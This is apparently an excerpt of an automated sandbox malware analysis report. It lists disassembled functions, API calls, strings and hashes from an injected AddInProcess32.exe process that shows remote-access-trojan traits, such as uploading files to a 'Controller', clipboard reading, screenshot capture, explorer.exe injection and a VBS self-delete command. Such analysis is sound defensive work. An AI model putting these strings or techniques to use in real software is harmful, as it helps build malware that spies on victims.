                                                                                                Function 00451346 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • ___free_lconv_mon.LIBCMT ref: 0045138A
                                                                                                  • Part of subcall function 00450582: _free.LIBCMT ref: 0045059F
                                                                                                  • Part of subcall function 00450582: _free.LIBCMT ref: 004505B1
                                                                                                  • Part of subcall function 00450582: _free.LIBCMT ref: 004505C3
                                                                                                  • Part of subcall function 00450582: _free.LIBCMT ref: 004505D5
                                                                                                  • Part of subcall function 00450582: _free.LIBCMT ref: 004505E7
                                                                                                  • Part of subcall function 00450582: _free.LIBCMT ref: 004505F9
                                                                                                  • Part of subcall function 00450582: _free.LIBCMT ref: 0045060B
                                                                                                  • Part of subcall function 00450582: _free.LIBCMT ref: 0045061D
                                                                                                  • Part of subcall function 00450582: _free.LIBCMT ref: 0045062F
                                                                                                  • Part of subcall function 00450582: _free.LIBCMT ref: 00450641
                                                                                                  • Part of subcall function 00450582: _free.LIBCMT ref: 00450653
                                                                                                  • Part of subcall function 00450582: _free.LIBCMT ref: 00450665
                                                                                                  • Part of subcall function 00450582: _free.LIBCMT ref: 00450677
                                                                                                • _free.LIBCMT ref: 0045137F
                                                                                                  • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?), ref: 00446818
                                                                                                  • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                                                                                • _free.LIBCMT ref: 004513A1
                                                                                                • _free.LIBCMT ref: 004513B6
                                                                                                • _free.LIBCMT ref: 004513C1
                                                                                                • _free.LIBCMT ref: 004513E3
                                                                                                • _free.LIBCMT ref: 004513F6
                                                                                                • _free.LIBCMT ref: 00451404
                                                                                                • _free.LIBCMT ref: 0045140F
                                                                                                • _free.LIBCMT ref: 00451447
                                                                                                • _free.LIBCMT ref: 0045144E
                                                                                                • _free.LIBCMT ref: 0045146B
                                                                                                • _free.LIBCMT ref: 00451483
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                • String ID:
                                                                                                • API String ID: 161543041-0
                                                                                                • Opcode ID: 9bfda5629608ba7fc19c0d50907ac959002cc076efa33527145bad7316b2b0bb
                                                                                                • Instruction ID: 2428002f6fd8eb1a99257b9b861ac38f7c05b5b97acacff09fd9d8cf260fe807
                                                                                                • Opcode Fuzzy Hash: 9bfda5629608ba7fc19c0d50907ac959002cc076efa33527145bad7316b2b0bb
                                                                                                • Instruction Fuzzy Hash: 403193715003009FEB20AA39D846F5B73E8EF02315F62992FE849D7662DF78AD44C729
                                                                                                Function 00408BB5 Relevance: 19.6, APIs: 8, Strings: 3, Instructions: 328fileCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,000000B6), ref: 00408D1E
                                                                                                • GetFileSizeEx.KERNEL32(00000000,?), ref: 00408D56
                                                                                                • __aulldiv.LIBCMT ref: 00408D88
                                                                                                  • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                                                                  • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                                                • SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 00408EAB
                                                                                                • ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00408EC6
                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00408F9F
                                                                                                • CloseHandle.KERNEL32(00000000,00000052), ref: 00408FE9
                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00409037
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: File$CloseHandle$CreateLocalPointerReadSizeTime__aulldivsend
                                                                                                • String ID: ReadFile error$SetFilePointerEx error$Uploading file to Controller:
                                                                                                • API String ID: 3086580692-2596673759
                                                                                                • Opcode ID: a61a8049a5d6a82d20a64dbbd0cf336a534be65d40654f4dc6c97dc52abac298
                                                                                                • Instruction ID: 2d1ece25e1b497defd969945f9de4b01d63c4d7912a1bb42583949d7b10afa87
                                                                                                • Opcode Fuzzy Hash: a61a8049a5d6a82d20a64dbbd0cf336a534be65d40654f4dc6c97dc52abac298
                                                                                                • Instruction Fuzzy Hash: 76B1A0316083409BC314FB26C941AAFB7E5AFC4358F40492FF589622D2EF789945CB9B
                                                                                                Function 0040D83A Relevance: 19.4, APIs: 3, Strings: 8, Instructions: 148COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                  • Part of subcall function 0041288B: TerminateProcess.KERNEL32(00000000,pth_unenc,0040F903), ref: 0041289B
                                                                                                  • Part of subcall function 0041288B: WaitForSingleObject.KERNEL32(000000FF), ref: 004128AE
                                                                                                  • Part of subcall function 00413733: RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,00000000,00475300), ref: 0041374F
                                                                                                  • Part of subcall function 00413733: RegQueryValueExA.KERNELBASE(00000000,00000000,00000000,00000000,00000208,?), ref: 00413768
                                                                                                  • Part of subcall function 00413733: RegCloseKey.KERNELBASE(00000000), ref: 00413773
                                                                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040D894
                                                                                                • ShellExecuteW.SHELL32(00000000,open,00000000,00466478,00466478,00000000), ref: 0040D9F3
                                                                                                • ExitProcess.KERNEL32 ref: 0040D9FF
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
                                                                                                • String ID: """, 0$.vbs$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$HSG$Temp$exepath$open
                                                                                                • API String ID: 1913171305-833065420
                                                                                                • Opcode ID: 04d70a03bbc3f3b7202041afa2082218f197807b0f0dee89797c103131059630
                                                                                                • Instruction ID: 050033375253242a90a907d975c9615f3488646990559cd5331657e2136e0730
                                                                                                • Opcode Fuzzy Hash: 04d70a03bbc3f3b7202041afa2082218f197807b0f0dee89797c103131059630
                                                                                                • Instruction Fuzzy Hash: 514139319001155ACB15FBA2DC56DEEB778AF50709F10017FB10AB21E2FF785E4ACA98
                                                                                                Function 00450680 Relevance: 18.4, APIs: 12, Instructions: 376COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _free
                                                                                                • String ID:
                                                                                                • API String ID: 269201875-0
                                                                                                • Opcode ID: eb0df5fda3918316229511e27b327a59e2685e6d7c39cee33e37fcee88581610
                                                                                                • Instruction ID: 80ca3ff3fa16d46db3e6ae4c9b8471dba03f652ca918f9f25067e0b92ee87d4d
                                                                                                • Opcode Fuzzy Hash: eb0df5fda3918316229511e27b327a59e2685e6d7c39cee33e37fcee88581610
                                                                                                • Instruction Fuzzy Hash: 30C183B6D40204ABEB20DBA9CC43FDE77F8AB09705F150166FE04EB283D6B49D459768
                                                                                                Function 00455C5B Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272COMMONLIBRARYCODE
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                  • Part of subcall function 00455929: CreateFileW.KERNEL32(00000000,00000000,?,00455D04,?,?,00000000,?,00455D04,00000000,0000000C), ref: 00455946
                                                                                                • GetLastError.KERNEL32 ref: 00455D6F
                                                                                                • __dosmaperr.LIBCMT ref: 00455D76
                                                                                                • GetFileType.KERNEL32(00000000), ref: 00455D82
                                                                                                • GetLastError.KERNEL32 ref: 00455D8C
                                                                                                • __dosmaperr.LIBCMT ref: 00455D95
                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00455DB5
                                                                                                • CloseHandle.KERNEL32(?), ref: 00455EFF
                                                                                                • GetLastError.KERNEL32 ref: 00455F31
                                                                                                • __dosmaperr.LIBCMT ref: 00455F38
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                                                • String ID: H
                                                                                                • API String ID: 4237864984-2852464175
                                                                                                • Opcode ID: 3e80e4deedef708004bf5c1f14aafc2c87dd9643035db764e93b071d2df20022
                                                                                                • Instruction ID: 7cd045c9b8f196398d23f94ba58010557f508cd7b58f44c29b3e784ccbbfb847
                                                                                                • Opcode Fuzzy Hash: 3e80e4deedef708004bf5c1f14aafc2c87dd9643035db764e93b071d2df20022
                                                                                                • Instruction Fuzzy Hash: 44A14532A106049FDF19AF68DC657BE3BA0EB06325F24015EEC11AB392D6398D1AC759
                                                                                                Function 00450AA5 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 204COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _free
                                                                                                • String ID: \&G$\&G$`&G
                                                                                                • API String ID: 269201875-253610517
                                                                                                • Opcode ID: 0824e7aa1874106c2a06b8faea0234afc0e854fad8f6d89c65d52aec9f97b586
                                                                                                • Instruction ID: 59c4f5d9f803fa3be21c2588ad204ea2c1e8261bb9e1a4607c4596bf86990b35
                                                                                                • Opcode Fuzzy Hash: 0824e7aa1874106c2a06b8faea0234afc0e854fad8f6d89c65d52aec9f97b586
                                                                                                • Instruction Fuzzy Hash: 86610E75900205AFDB21DF69C842B9ABBF4EF06710F24426BED44EB242E774AD45CB58
                                                                                                Function 00414BEB Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 158COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: 65535$udp
                                                                                                • API String ID: 0-1267037602
                                                                                                • Opcode ID: 92e56e7e39f2557d79d3192c533dec3724d183fd0175ec4c26052f24408cebce
                                                                                                • Instruction ID: a9902b4e2b63063b067a15c036b171ad6d3a8658db747517b03e91dd9f9ead29
                                                                                                • Opcode Fuzzy Hash: 92e56e7e39f2557d79d3192c533dec3724d183fd0175ec4c26052f24408cebce
                                                                                                • Instruction Fuzzy Hash: FB51D431605301ABDB609B14E905BFB77E8ABC5754F08042FF88597390E76CCCC1969E
                                                                                                Function 0043A8BA Relevance: 16.6, APIs: 11, Instructions: 116COMMONLIBRARYCODE
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401BD9,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A912
                                                                                                • GetLastError.KERNEL32(?,?,00401BD9,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A91F
                                                                                                • __dosmaperr.LIBCMT ref: 0043A926
                                                                                                • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401BD9,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A952
                                                                                                • GetLastError.KERNEL32(?,?,?,00401BD9,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A95C
                                                                                                • __dosmaperr.LIBCMT ref: 0043A963
                                                                                                • WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,?,?,?,?,?,00401BD9,?), ref: 0043A9A6
                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,00401BD9,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A9B0
                                                                                                • __dosmaperr.LIBCMT ref: 0043A9B7
                                                                                                • _free.LIBCMT ref: 0043A9C3
                                                                                                • _free.LIBCMT ref: 0043A9CA
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
                                                                                                • String ID:
                                                                                                • API String ID: 2441525078-0
                                                                                                • Opcode ID: 1b21161869a1c6c97ce00f002d4111b93a94d55ba7b455788bfa216644d838f2
                                                                                                • Instruction ID: 3a2165a63a30732921e8d6571a772c998230e0148124485b419b79488018c54b
                                                                                                • Opcode Fuzzy Hash: 1b21161869a1c6c97ce00f002d4111b93a94d55ba7b455788bfa216644d838f2
                                                                                                • Instruction Fuzzy Hash: 8631D5B180420AFBDF01AFA5CC45EAF3B6CEF09324F11451AF950662A1DB38CD61DB66
                                                                                                Function 004054A0 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 155windowmemoryCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • SetEvent.KERNEL32(?,?), ref: 004054BF
                                                                                                • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0040556F
                                                                                                • TranslateMessage.USER32(?), ref: 0040557E
                                                                                                • DispatchMessageA.USER32(?), ref: 00405589
                                                                                                • HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,00474F88), ref: 00405641
                                                                                                • HeapFree.KERNEL32(00000000,00000000,0000003B,0000003B,?,00000000), ref: 00405679
                                                                                                  • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
                                                                                                • String ID: CloseChat$DisplayMessage$GetMessage
                                                                                                • API String ID: 2956720200-749203953
                                                                                                • Opcode ID: 12852d6bc5b46f9587c338b97c007cdef4094efca5628a1d2a52f2a43cec2207
                                                                                                • Instruction ID: af141abdc89e6f99b360bf73ca1bd21391e8bea30a055eafc68b1e1601de11b4
                                                                                                • Opcode Fuzzy Hash: 12852d6bc5b46f9587c338b97c007cdef4094efca5628a1d2a52f2a43cec2207
                                                                                                • Instruction Fuzzy Hash: 6F419E71604301ABCB14FB76DC5A86F37A9AB85704F40493EF516A32E1EF3C8905CB9A
                                                                                                Function 00417D1A Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 108filesynchronizationCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                  • Part of subcall function 00417F67: __EH_prolog.LIBCMT ref: 00417F6C
                                                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,004660B4), ref: 00417E17
                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00417E20
                                                                                                • DeleteFileA.KERNEL32(00000000), ref: 00417E2F
                                                                                                • ShellExecuteExA.SHELL32(0000003C,00000000,00000010,?,?,?), ref: 00417DE3
                                                                                                  • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CloseDeleteExecuteFileH_prologHandleObjectShellSingleWaitsend
                                                                                                • String ID: <$@$@VG$@VG$Temp
                                                                                                • API String ID: 1704390241-1291085672
                                                                                                • Opcode ID: 9af8200f3ee1639701cccb04960a61a80750d0e9051a8b89500f0c6a32ec4c99
                                                                                                • Instruction ID: 17e4c8e037c7e297ff37edeb8814921eaebe5ca95f3622e3753009d7d6553322
                                                                                                • Opcode Fuzzy Hash: 9af8200f3ee1639701cccb04960a61a80750d0e9051a8b89500f0c6a32ec4c99
                                                                                                • Instruction Fuzzy Hash: 15417E319002199ACB14FB62DC56AEE7735AF00318F50417EF50A761E1EF7C5A8ACB99
                                                                                                Function 004073E7 Relevance: 15.8, APIs: 2, Strings: 7, Instructions: 99COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetCurrentProcess.KERNEL32(00472B28,00000000,RGw@,00003000,00000004,00000000,00000001), ref: 00407418
                                                                                                • GetCurrentProcess.KERNEL32(00472B28,00000000,00008000,?,00000000,00000001,00000000,00407691,C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe), ref: 004074D9
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CurrentProcess
                                                                                                • String ID: PEB: %x$[+] NtAllocateVirtualMemory Success$[-] NtAllocateVirtualMemory Error$\explorer.exe$explorer.exe$windir$RGw@
                                                                                                • API String ID: 2050909247-1783200977
                                                                                                • Opcode ID: 1a1eb9634b651143de70fee5b7a2289a57af99024fb0b6e7e4d2875ac9661c3b
                                                                                                • Instruction ID: b8c3dc73ce560081c95a6921e0e4b034ac7c55c8f908ce4a4bfc67d5bc942e58
                                                                                                • Opcode Fuzzy Hash: 1a1eb9634b651143de70fee5b7a2289a57af99024fb0b6e7e4d2875ac9661c3b
                                                                                                • Instruction Fuzzy Hash: 7631C271604700ABD311EF65DE46F1677A8FB48315F10087EF509E6292DBB8B8418B6E
                                                                                                Function 0041697B Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 46clipboardCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • OpenClipboard.USER32 ref: 0041697C
                                                                                                • EmptyClipboard.USER32 ref: 0041698A
                                                                                                • CloseClipboard.USER32 ref: 00416990
                                                                                                • OpenClipboard.USER32 ref: 00416997
                                                                                                • GetClipboardData.USER32(0000000D), ref: 004169A7
                                                                                                • GlobalLock.KERNEL32(00000000), ref: 004169B0
                                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 004169B9
                                                                                                • CloseClipboard.USER32 ref: 004169BF
                                                                                                  • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Clipboard$CloseGlobalOpen$DataEmptyLockUnlocksend
                                                                                                • String ID: !D@
                                                                                                • API String ID: 2172192267-604454484
                                                                                                • Opcode ID: 7be66b7c6d22a24665ea8efe49d73a8374f168185230e6da9151f71de6443d1b
                                                                                                • Instruction ID: 51ec5b3583c04982a71d168622c94cade283f75070810aedfe93923cca0dc87c
                                                                                                • Opcode Fuzzy Hash: 7be66b7c6d22a24665ea8efe49d73a8374f168185230e6da9151f71de6443d1b
                                                                                                • Instruction Fuzzy Hash: 41014C31204301EFC714BB72DC49AAE7BA5AF88742F40047EF906861E2DF388C45C659
                                                                                                Function 0041330D Relevance: 15.2, APIs: 10, Instructions: 153fileCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • CreateFileMappingW.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 00413452
                                                                                                • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 00413460
                                                                                                • GetFileSize.KERNEL32(?,00000000), ref: 0041346D
                                                                                                • UnmapViewOfFile.KERNEL32(00000000), ref: 0041348D
                                                                                                • CloseHandle.KERNEL32(00000000), ref: 0041349A
                                                                                                • CloseHandle.KERNEL32(?), ref: 004134A0
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: File$CloseHandleView$CreateMappingSizeUnmap
                                                                                                • String ID:
                                                                                                • API String ID: 297527592-0
                                                                                                • Opcode ID: 6c4afa5863eaa99705a7796b4049685c5ffc1d41bc06d7032679042578303c3d
                                                                                                • Instruction ID: cfdeae1586e3f17d3ae994cf28232467201964e06db1490d1c70a6fe2d897c90
                                                                                                • Opcode Fuzzy Hash: 6c4afa5863eaa99705a7796b4049685c5ffc1d41bc06d7032679042578303c3d
                                                                                                • Instruction Fuzzy Hash: A841F371104301BBD7109F26EC49F6B3BACEFC9769F10052EF655D21A2DB38DA40866E
                                                                                                Function 0041AB9E Relevance: 15.1, APIs: 10, Instructions: 66serviceCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,00000001,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABAD
                                                                                                • OpenServiceW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABC4
                                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABD1
                                                                                                • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABE0
                                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABF1
                                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABF4
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Service$CloseHandle$Open$ControlManager
                                                                                                • String ID:
                                                                                                • API String ID: 221034970-0
                                                                                                • Opcode ID: 77d1dba04074bb5c0b27b9b0f176deadcb724c45256b7ec0605674b85678f877
                                                                                                • Instruction ID: a7ddf6af562b27afc3fdb57d9320cc893b1711f81dd6882f7bac22400d97ef93
                                                                                                • Opcode Fuzzy Hash: 77d1dba04074bb5c0b27b9b0f176deadcb724c45256b7ec0605674b85678f877
                                                                                                • Instruction Fuzzy Hash: 1411E931501218BFD711AF64DC85CFF3B6CDB41B66B000426FA0692191EB689D46AAFA
                                                                                                Function 004481A1 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • _free.LIBCMT ref: 004481B5
                                                                                                  • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?), ref: 00446818
                                                                                                  • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                                                                                • _free.LIBCMT ref: 004481C1
                                                                                                • _free.LIBCMT ref: 004481CC
                                                                                                • _free.LIBCMT ref: 004481D7
                                                                                                • _free.LIBCMT ref: 004481E2
                                                                                                • _free.LIBCMT ref: 004481ED
                                                                                                • _free.LIBCMT ref: 004481F8
                                                                                                • _free.LIBCMT ref: 00448203
                                                                                                • _free.LIBCMT ref: 0044820E
                                                                                                • _free.LIBCMT ref: 0044821C
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                                • String ID:
                                                                                                • API String ID: 776569668-0
                                                                                                • Opcode ID: 7409258e8d3de90c3944c0df00460aed843c684c15a9003062b0a9d40dd376ab
                                                                                                • Instruction ID: 68a5115f29dd4dda1e04096f5587add38bc33a27c3b2fba9646c6a67a64c999e
                                                                                                • Opcode Fuzzy Hash: 7409258e8d3de90c3944c0df00460aed843c684c15a9003062b0a9d40dd376ab
                                                                                                • Instruction Fuzzy Hash: AA11E9B6901108BFDB01FF55C852CDD3B65FF05354B0244AAF9488F222DB75DE509B95
                                                                                                Function 0041A045 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 176sleeptimeCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • __EH_prolog.LIBCMT ref: 0041A04A
                                                                                                • GdiplusStartup.GDIPLUS(00474AE0,?,00000000), ref: 0041A07C
                                                                                                • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 0041A108
                                                                                                • Sleep.KERNEL32(000003E8), ref: 0041A18E
                                                                                                • GetLocalTime.KERNEL32(?), ref: 0041A196
                                                                                                • Sleep.KERNEL32(00000000,00000018,00000000), ref: 0041A285
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Sleep$CreateDirectoryGdiplusH_prologLocalStartupTime
                                                                                                • String ID: time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i
                                                                                                • API String ID: 489098229-3790400642
                                                                                                • Opcode ID: af4cd6d10bda7ff1b9bb4239446f4407f1b7e606fded6ef68a99ac04b8ddb70e
                                                                                                • Instruction ID: ac563f1b8c988fbcbdb25ffa0f060f034023d1de15a29d9718e9897573209577
                                                                                                • Opcode Fuzzy Hash: af4cd6d10bda7ff1b9bb4239446f4407f1b7e606fded6ef68a99ac04b8ddb70e
                                                                                                • Instruction Fuzzy Hash: 3F518E70A00215AACB14BBB5C8529FD77A9AF54308F40403FF509AB1E2EF7C4D85C799
                                                                                                Function 00455F84 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 154COMMONLIBRARYCODE
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,0045707F), ref: 00455FA7
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: DecodePointer
                                                                                                • String ID: acos$asin$exp$log$log10$pow$sqrt
                                                                                                • API String ID: 3527080286-3064271455
                                                                                                • Opcode ID: d3e7b15c46cdd208759493adff4216d8049d52db36716e3e1ce652e173acd39f
                                                                                                • Instruction ID: 9e278d4a377d0ea10dd73248deb0d867b2e8f6339126d6964ada8e5ca1a1e79f
